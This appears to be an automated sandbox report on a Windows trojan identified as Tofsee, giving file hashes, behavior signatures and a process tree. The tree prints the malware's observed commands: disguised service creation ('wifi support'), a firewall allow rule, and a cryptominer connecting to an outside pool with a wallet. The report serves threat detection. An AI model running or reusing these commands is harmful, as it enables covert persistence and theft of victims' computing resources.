Overview

overview

10

Static

static

f51e0dfab6...a2.exe

windows7_x64

10

f51e0dfab6...a2.exe

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    13-11-2020 15:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2.exe

  • Size

    11.9MB

  • MD5

    9654ddf379a2487d9e914298a5793eb7

  • SHA1

    0bcb76ef01d5085380a5dfb959f061d6aae86765

  • SHA256

    f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2

  • SHA512

    d662b168f8520df61973089618801719fc3503dbc0b75e2382543b7087801c433f7c6a717e0412c34563dd174158512f542e5efb8438f322e70d183128f6aa6a

Score
10/10
tofseeevasionpersistencetrojan

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2.exe
    "C:\Users\Admin\AppData\Local\Temp\f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4708
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\obxawhzc\
      2⤵
        PID:940
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uboorcup.exe" C:\Windows\SysWOW64\obxawhzc\
        2⤵
          PID:3780
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create obxawhzc binPath= "C:\Windows\SysWOW64\obxawhzc\uboorcup.exe /d\"C:\Users\Admin\AppData\Local\Temp\f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:788
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description obxawhzc "wifi internet conection"
            2⤵
              PID:3912
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start obxawhzc
              2⤵
                PID:2108
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:860
              • C:\Windows\SysWOW64\obxawhzc\uboorcup.exe
                C:\Windows\SysWOW64\obxawhzc\uboorcup.exe /d"C:\Users\Admin\AppData\Local\Temp\f51e0dfab62c98ac8a15c80312e1ccadeba526be8caba8ed9a80f14a89b420a2.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:536
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Modifies service
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:640
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4440

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\uboorcup.exe
                MD5

                fd38926ae614f45f761de204abd52ae9

                SHA1

                fba9690667f1da649b72e7e1efcd64adabe0d618

                SHA256

                ea1fb6f4688f3e57e5410d10c901fac9581047749b2faa49622b684b0e31ae38

                SHA512

                fdbe78d398d986c7b6f4747aca19a164fc3cde8c4ab965c9982bf366b7f87c18705660d4a7379780fbd8a6869f51547f9d0032e3dc2e62fe34cce5223672f734

                Download Submit

              • C:\Windows\SysWOW64\obxawhzc\uboorcup.exe
                MD5

                fd38926ae614f45f761de204abd52ae9

                SHA1

                fba9690667f1da649b72e7e1efcd64adabe0d618

                SHA256

                ea1fb6f4688f3e57e5410d10c901fac9581047749b2faa49622b684b0e31ae38

                SHA512

                fdbe78d398d986c7b6f4747aca19a164fc3cde8c4ab965c9982bf366b7f87c18705660d4a7379780fbd8a6869f51547f9d0032e3dc2e62fe34cce5223672f734

                Download Submit

              • memory/640-13-0x0000000000BF0000-0x0000000000C00000-memory.dmp

                Filesize

                64KB

                Download

              • memory/640-16-0x00000000036D0000-0x00000000036D7000-memory.dmp

                Filesize

                28KB

                Download

              • memory/640-15-0x0000000008F90000-0x000000000939B000-memory.dmp

                Filesize

                4.0MB

                Download

              • memory/640-14-0x00000000035F0000-0x00000000035F5000-memory.dmp

                Filesize

                20KB

                Download

              • memory/640-7-0x0000000000A40000-0x0000000000A55000-memory.dmp

                Filesize

                84KB

                Download

              • memory/640-8-0x0000000000A49A6B-mapping.dmp

                Download

              • memory/640-11-0x0000000004840000-0x0000000004A4F000-memory.dmp

                Filesize

                2.1MB

                Download

              • memory/640-12-0x0000000000BE0000-0x0000000000BE6000-memory.dmp

                Filesize

                24KB

                Download

              • memory/788-3-0x0000000000000000-mapping.dmp

                Download

              • memory/860-10-0x0000000000000000-mapping.dmp

                Download

              • memory/940-0-0x0000000000000000-mapping.dmp

                Download

              • memory/2108-5-0x0000000000000000-mapping.dmp

                Download

              • memory/3780-1-0x0000000000000000-mapping.dmp

                Download

              • memory/3912-4-0x0000000000000000-mapping.dmp

                Download

              • memory/4440-17-0x0000000000EC0000-0x0000000000FB1000-memory.dmp

                Filesize

                964KB

                Download

              • memory/4440-19-0x0000000000F5259C-mapping.dmp

                Download